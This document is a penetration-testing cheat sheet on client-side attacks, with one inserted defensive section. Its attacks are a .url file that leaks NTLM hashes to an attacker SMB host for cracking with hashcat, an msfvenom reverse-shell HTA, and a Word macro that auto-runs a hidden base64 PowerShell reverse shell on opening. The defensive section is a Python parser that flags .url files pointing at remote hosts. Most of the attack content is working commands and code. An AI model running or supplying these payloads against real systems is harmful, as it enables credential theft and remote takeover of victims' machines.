Client Side Attacks
URL Attack (Formerly SCF)
If there is a location the user reads files from, such as an FTP or SMB share, place a file like the one below there to grab their hash with smbserver.py or Responder once they click it. Then crack the hash with Hashcat.
smbserver.py share . -smb2support
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\192.168.56.128\%USERNAME%.icon
IconIndex=1
Create it as a .txt file and rename it to .url before sending it or placing it in the location the user browses.
hashcat -m 5600 hash.txt /root/rockyou.txt --force
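A detection-side counterpart, added here and not part of the original notes: a small parser that flags .url files whose IconFile, URL or WorkingDirectory points at a remote host over UNC or file://, which is the pattern the shortcut above relies on. The sample file is constructed from the fields shown above.

```python
import re
from typing import Dict, List, Optional

# Constructed sample mirroring the .url file described above (not a real capture).
SAMPLE_URL_FILE = """[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\\\192.168.56.128\\%USERNAME%.icon
IconIndex=1
"""

# IconFile is resolved when Explorer renders the icon; URL and WorkingDirectory
# are resolved when the shortcut is used. Any of them pointing off-host is worth a look.
CHECKED_KEYS = ("IconFile", "URL", "WorkingDirectory")

UNC_RE = re.compile(r"^\\\\([^\\\s]+)\\")                       # \\host\share\...
FILE_URL_RE = re.compile(r"^file://([^/\\]+)[/\\]", re.IGNORECASE)  # file://host/...


def parse_url_file(text: str) -> Dict[str, str]:
    """Parse the [InternetShortcut] section into a dict with lower-cased keys."""
    values: Dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip().lower()] = value.strip()
    return values


def remote_host(value: str) -> Optional[str]:
    """Return the remote host a field value points to, or None if it is local/relative."""
    for pattern in (UNC_RE, FILE_URL_RE):
        match = pattern.match(value)
        if match:
            return match.group(1)
    return None


def suspicious_fields(text: str) -> List[str]:
    """Return 'Key -> host' findings for every checked field that references a remote host."""
    values = parse_url_file(text)
    return [f"{key} -> {host}" for key in CHECKED_KEYS
            if (host := remote_host(values.get(key.lower(), "")))]


if __name__ == "__main__":
    print(suspicious_fields(SAMPLE_URL_FILE))
```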
HTA
HTML Applications are executed by mshta.exe if the user opens them in IE or Edge (with Edge the user has more security prompts to click through).
msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f hta-psh -o shell.hta
Host the file on a web server or upload it to a known location where the user will open it.
Macro
Create a macro in a Word document that auto-launches on opening to give a reverse shell.
You can use the previous msfvenom command to generate a PowerShell payload, or just use revshells.com.
Split the PowerShell payload, because a single VBA line is not allowed to hold the full number of characters.
# Split a long one-line payload into 50-character chunks and print them as VBA
# string-concatenation lines (Python 3; the original used a Python 2 print statement).
payload = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."
n = 50
for i in range(0, len(payload), n):
    print("Str = Str + " + '"' + payload[i:i+n] + '"')
Then paste the generated lines into the macro:
' Both entry points fire when the document is opened (AutoOpen for Word, Document_Open for the document object)
Sub AutoOpen()
    MyMacroName
End Sub
Sub Document_Open()
    MyMacroName
End Sub
Sub MyMacroName()
    Dim Str As String
    ' Payload rebuilt from the chunks printed by the Python snippet above
    Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
    Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
    Str = Str + "TAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6A"
    Str = Str + "EYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEg"
    Str = Str + "ANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATAAxAFgANgAyACsAY"
    Str = Str + "gBTAEIARAAvAG4ARQBqADUASAAvAGgAZwBDAFoAQwBJAFoAUgB"
...
    Str = Str + "AZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0Ac"
    Str = Str + "AByAGUAcwBzACkADQAKACQAcwB0AHIAZQBhAG0AIAA9ACAATgB"
    Str = Str + "lAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtA"
    Str = Str + "FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA"
    Str = Str + "AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK"
    Str = Str + "QA="
    CreateObject("Wscript.Shell").Run Str
End Sub